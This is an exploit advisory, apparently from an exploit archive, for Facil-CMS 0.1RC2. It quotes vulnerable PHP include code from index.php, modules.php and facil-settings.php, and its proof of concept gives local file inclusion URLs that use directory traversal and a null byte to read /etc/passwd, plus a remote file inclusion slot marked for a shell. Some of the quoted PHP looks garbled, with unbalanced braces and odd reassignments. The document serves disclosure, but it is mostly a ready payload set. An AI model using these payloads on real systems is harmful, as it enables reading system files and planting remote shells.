81 lines
No EOL
2.3 KiB
Text
81 lines
No EOL
2.3 KiB
Text
########################################################
|
|
Facil-CMS (LFI/RFI) Vulnerability
|
|
########################################################
|
|
[+]Title : Facil-CMS Multiple Vulnerability
|
|
[+]Version: 0.1RC2
|
|
[+]Download: http://sourceforge.net/projects/facil-cms/files/
|
|
[+]Author: eidelweiss
|
|
[+]Contact: eidelweiss[at]cyberservices[dot]com
|
|
|
|
[!]Thank`s To: all friends
|
|
|
|
########################################################
|
|
|
|
-=[ Vuln C0de ]=-
|
|
***********************
|
|
[-]facil-cms/index.php
|
|
|
|
require_once('config.inc.php');
|
|
require_once(_FACIL_INCLUDES_PATH_ . '/facil-settings.php');
|
|
|
|
$config = new facilConfig();
|
|
$utils = new facilUtils();
|
|
|
|
if($utils->is_module($config->getSiteIndex()))
|
|
|
|
require_once(_FACIL_MODULES_PATH_ . '/' . $config->getSiteIndex() . '/config.php');
|
|
require_once(_FACIL_MODULES_PATH_ . '/' . $config->getSiteIndex() . '/class/index.php');
|
|
|
|
***********************
|
|
[-]facil-cms/modules.php
|
|
|
|
require_once('config.inc.php');
|
|
require_once(_FACIL_INCLUDES_PATH_ . '/facil-settings.php');
|
|
|
|
if($_POST['modload'] && !eregi("/", $_POST['modload']))
|
|
{
|
|
$_MODLOAD = trim($_POST['modload']);
|
|
if($_POST['fileload'] && !eregi("/", $_POST['fileload']))
|
|
{
|
|
$FILELOAD = trim($_POST['fileload']);
|
|
|
|
$_MODLOAD = false;
|
|
$FILELOAD = false;
|
|
|
|
if($_POST['admload'] && !eregi("/", $_POST['admload']))
|
|
{
|
|
$_ADMLOAD = trim($_POST['admload']);
|
|
if($_POST['fileload'] && !eregi("/", $_POST['fileload']))
|
|
|
|
|
|
$_ADMLOAD = false;
|
|
$FILELOAD = false;
|
|
|
|
require_once(_FACIL_MODULES_PATH_ . '/' . $_MODLOAD . '/config.php');
|
|
require_once(_FACIL_MODULES_PATH_ . '/' . $_MODLOAD . '/class/index.php');
|
|
|
|
*******************
|
|
|
|
[-]facil-cms/includes/facil-settings.php
|
|
|
|
if(!isset($_SESSION['FACIL_LANGUAGE']))
|
|
{
|
|
$_SESSION['FACIL_LANGUAGE'] = $config->getLanguage();
|
|
}
|
|
|
|
require_once(_FACIL_I18N_PATH_ . '/lang-' . $_SESSION['FACIL_LANGUAGE'] . '.php');
|
|
require_once(_FACIL_THEMES_PATH_ . '/' . $_SESSION['FACIL_THEME'] . '/themeFacil.class.php');
|
|
|
|
*******************
|
|
|
|
-=[ Proof Of Concept ]=-
|
|
|
|
http://127.0.0.1/facil-cms/modules.php?modload=../../../../../../../../etc/passwd%00
|
|
Similar reference:
|
|
http://www.exploit-db.com/exploits/5792
|
|
|
|
http://127.0.0.1/facil-cms/index.php?getSiteIndex=../../../../../../../../etc/passwd%00
|
|
|
|
http://127.0.0.1/facil-cms//includes/facil-settings.php?FACIL_THEME= [rfi shell]
|
|
|
|
######################################################## |